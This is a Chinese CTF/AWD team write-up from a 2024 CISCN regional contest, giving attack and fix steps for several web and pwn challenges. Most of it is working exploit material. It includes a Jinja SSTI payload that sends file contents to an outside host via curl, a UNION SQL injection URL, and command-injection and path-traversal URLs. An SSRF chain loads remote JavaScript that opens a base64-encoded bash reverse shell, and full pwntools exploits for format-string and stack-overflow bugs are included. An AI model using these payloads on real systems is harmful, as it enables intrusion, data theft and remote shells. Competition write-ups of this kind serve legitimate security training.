2024 CISCN 华东北分区赛-Ahisec

Ahisec战队

WEB

python-1

break

源码如下：

# -*- coding: UTF-8 -*-from flask import Flask, request,render_template,render_template_stringapp = Flask(__name__)def blacklist(name):blacklists = ["print","cat","flag","nc","bash","sh","curl","{{","}},""wget","ash","session","class","subclasses","for","popen","args"]for keyword in blacklists:if keyword in name:return Truereturn False@app.route("/", methods=["GET","POST"])
def index():if request.method == "POST":try:name = request.form['name']names = blacklist(name)if names == True:return "Oh,False!"html = '''<html><head><title>^_^</title></head><body><div><h1>Hello: %s</h1></div></body></html>''' % namereturn render_template_string(html)except ValueError:passelse:html = '''<html><head><title>^_^</title></head><body><div><h1>Change.</h1></div></body></html>'''return render_template_string(html)

fenjing一把梭，不过要注意print函数被禁用了，所以可以直接复制fenjing最终的payload，然后搭配curl命令进行文件内容的读取，curl被过滤了，拼接绕过

payload

name={%set x=cycler.next.__globals__.__builtins__.__import__('os')['p''open']('cu'+'rl http://10.101.64.15:8081/`sort /fl*`').read()%}

fix

防御就很简单了，直接把{%%}禁用

blacklists = ["print","cat","flag","nc","bash","sh","curl","{{","}},""wget","ash","session","class","subclasses","for","popen","args","{%","%}"]

# -*- coding: UTF-8 -*-from flask import Flask, request,render_template,render_template_stringapp = Flask(__name__)def blacklist(name):blacklists = ["print","cat","flag","nc","bash","sh","curl","{{","}},""wget","ash","session","class","subclasses","for","popen","args","{%","%}"]for keyword in blacklists:if keyword in name:return Truereturn False@app.route("/", methods=["GET","POST"])
def index():if request.method == "POST":try:name = request.form['name']names = blacklist(name)if names == True:return "Oh,False!"html = '''<html><head><title>^_^</title></head><body><div><h1>Hello: %s</h1></div></body></html>''' % namereturn render_template_string(html)except ValueError:passelse:html = '''<html><head><title>^_^</title></head><body><div><h1>Change.</h1></div></body></html>'''return render_template_string(html)

python-2

break

这题给的附件里的db文件里，使用navicat打开，就能直接看到flag了。非预期

fix

结合上面的特征，flag在数据库里，很明显存在sql注入，防御试了几遍，发现将这一段注释掉就可以过了，说实话这次的题和去年的没法比

php-1

fix

d盾扫描发现疑似后门

将其注释掉就可以防御，这我是真没想到，绷不住。

这题最后break被我遗忘了，真是曹了

php-2

break

使用seay源代码工具扫描的时候可以发现有很多sql注入相关的漏洞

分析了一轮下来发现searchlist.php中执行了sql语句，但是写死了

不过我也是因此找到了这题的漏洞点所在，看下面的代码

搜索关键字发现同级目录下有一个文件searchmodify.php

有过滤，并且过滤的很松，只是简单的替换而已，双写绕过就可以或者是大小写绕过

至于在哪里可以调用到这，查看adminuser.php可以发现action参数默认可以跳到userlist，userlist文件和searchmodify.php同级，最后的payload

http://192.64.1.3/adminuser.php?action=searchmodify&id=-1' Union seLEct NULL,CONCAT(0x1,iFNULL(CAST(`name` AS CHAR),0x20),0x1),NULL,NULL FROM cf.flag-- -

/var/www/html/action/adminuser/searchmodify.php存在sql注入漏洞

fix

加转义addslashes函数

php-3

break

index.php源码

<?php  
error_reporting(E_ALL);ini_set('display_errors','1');#important php in path:/var/www/html and php File names have 16 charactersif (isset($_GET['path']))  
{ $Input_data = $_GET['path'];$it=new DirectoryIterator($Input_data);foreach($it as $f){$path=$f->getFilename();if(file_exists($path)){echo "yes,it exists";}else{echo "too naive!";}}
}   
else 
{ highlight_file(__file__); 
} 
?>

import requestsstrings = "dqazwsxedcrfvtgb1234567890yhnujmikolp.php"tmp = ""
for a in range(20):for i in strings:url = "http://192.64.1.149/?path=glob:///var/www/html/"+tmp+i+'*'res = requests.get(url=url).textif "yes,it exists" in res:tmp += iprint(tmp)break

然后得到页面d88554c739859dfe.php

访问如下：

<?php
#flag in /flag.txt
highlight_file(__FILE__);
error_reporting(0);
$content=$_GET['cmd'];
// Set blacklist
$substitutions = array(  
' ' => '',
'flag' => '',
'cat' =>'',
'&&' =>'',
'||' =>'',
'%0a'=>'',
'less'=>'',
'more'=>'',
'%0d'=>'',
'|'=>'',
'&'=>'',
);
$cmd = str_replace( array_keys( $substitutions ), $substitutions, $content );
if(strlen($cmd)>12)
{echo "Not very good";
}
else
{system($cmd);
}

http://192.64.1.149/d88554c739859dfe.php?cmd=sort%09/f*

fix

flag替換成123

<?php
#flag in /flag.txt
highlight_file(__FILE__);
error_reporting(0);
$content=$_GET['cmd'];
// Set blacklist
$substitutions = array(  
' ' => '',
'flag' => '123',
'cat' =>'',
'&&' =>'',
'||' =>'',
'%0a'=>'',
'less'=>'',
'more'=>'',
'%0d'=>'',
'|'=>'',
'&'=>'',
);
$cmd = str_replace( array_keys( $substitutions ), $substitutions, $content );
if(strlen($cmd)>12)
{echo "Not very good";
}
else
{system($cmd);
}

php-4

break

祭出seay源代码审计系统

漏洞文件：

/var/www/html/admin/inclues/set_page.php

没有任何的过滤，file参数为空就会指定默认的footer.html页面。所以可以使用…/…/…/…/…/…/…/…/flag.txt去目录穿越直接读取flag.txt

直接目录穿越进行文件读取

http://192.64.1.106/admin/admin.php?act=set_footer&file=../../../../../../../flag.txt

Fix

加个替换，将…替换成空

java-1

break

ssrf 绕过本地限制即可

读取远程恶意js文件

http://192.44.1.112:8080/geturl?url=http://127.0.0.1:8080/cmd?test=http://10.101.64.12/poc.jsvar a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwMS42NC4xMi85MDAxIDA+JjE=}|{base64,-d}|{bash,-i}");}

fix

注释加载恶意js的地方即可

java-2

fix

jdbc修复即可

PWN

pwn-1

Fix

• stack 可执行，

• 把 stack 默认权限改成 rw

break

格式化字符串漏洞泄露 canary和stack 地址

然后栈溢出 ret2 shellcode

from pwn import *
import sys
s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(str(delim), data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(str(delim), data)
r       = lambda num                :io.recv(num)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
rl      = lambda                    :io.recvline()
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
ls      = lambda data               :log.success(data)
lss     = lambda s                  :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))context.arch      = 'amd64'
context.log_level = 'debug'
context.terminal  = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):'''Start the exploit against the target.'''if args.GDB:return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)elif args.RE:return remote('192.64.1.194',80)elif args.AWD:# python3 exp.py AWD 1.1.1.1 PORTIP = str(sys.argv[1])PORT = int(sys.argv[2])return remote(IP,PORT)else:return process([binary] + argv, *a, **kw)binary = './pwn'
libelf = ''if (binary!=''): elf  = ELF(binary) ; rop=ROP(binary);libc = elf.libc
if (libelf!=''): libc = ELF(libelf)gdbscript = '''
brva 0x0014B7
brva 0x0014D7
#continue
'''.format(**locals())io = start(binary)def sett(name):ru('2: get name\n')sl('1')ru('->set name')s(name)#gdb.attach(io,gdbscript)
pay = f'%{6+0xb}$p%{6+0xc}$p'
sett(pay)ru('2: get name\n')
sl('2')ru('0x')
can = int(r(16),16)
lss('can')
st = int(r(len('0x7ffc4963dec0')),16)
lss('st')
ret = st - 0x60
#pay = asm(shellcraft.read(0,ret,0x400)).ljust(72,b'\x90')
pay  = asm(shellcraft.openat(-100, 'flag',0))
pay += asm(shellcraft.sendfile(1,'rax',0,0x50))
pay  = pay.ljust(72,b'A')
pay += p64(can) * 2
pay += p64(ret)
sett(pay)#ru('2: get name\n')
#sl('2')ru('2: get name\n')
sl('3')#pause()
#pay = b'\x90' * 0x20
#pay += asm(shellcraft.openat(-1, 'flag'))
#pay += asm(shellcraft.sendfile(1,'rax',0,0x50))
#
#sl(pay)itr()

pwn-2

Fix

• 把这个 4 改成 8

break

check flag 会把 flag 放到 heap上， 通过泄露 bss 上的heap 地址，然后 在直接 看heap地址 里的flag 既可以

from pwn import *
import sys
s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(str(delim), data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(str(delim), data)
r       = lambda num                :io.recv(num)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
rl      = lambda                    :io.recvline()
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
ls      = lambda data               :log.success(data)
lss     = lambda s                  :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))context.arch      = 'amd64'
context.log_level = 'debug'
context.terminal  = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):'''Start the exploit against the target.'''if args.GDB:return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)elif args.RE:return remote('192.64.1.217',80)elif args.AWD:# python3 exp.py AWD 1.1.1.1 PORTIP = str(sys.argv[1])PORT = int(sys.argv[2])return remote(IP,PORT)else:return process([binary] + argv, *a, **kw)binary = './pwn'
libelf = ''if (binary!=''): elf  = ELF(binary) ; rop=ROP(binary);libc = elf.libc
if (libelf!=''): libc = ELF(libelf)gdbscript = '''
b *0x401E03
b *0x402150
#continue
'''.format(**locals())io = start(binary)def ls_flag():ru('6: check flag\n')sl('1')def add_flag():ru('6: check flag\n')sl('2')def edit_flag(idx,data):ru('6: check flag\n')sl('3')ru(':id')sl(str(idx))#pause()sl(str(data))#gdb.attach(io,gdbscript)
add_flag()ru('6: check flag\n')
sl('6')x = 0x4e67a0ru('6: check flag\n')
sl('5')
sl(str(x))ru('flag_get::')
ru(':')
x= uu64(r(4))lss('x')
flag = x + 3392 - 0x1f
ru('6: check flag\n')
sl('5')
sl(str(flag))#edit_flag(0x4e6018+184, 0x401E03)
#edit_flag(0x4e6018, 0x401E03)
#while(1):
#    d = io.recv(200)
#    if b'flag{' in d:
#        print(d)
#        pause()
#
#  
#io.close()
itr()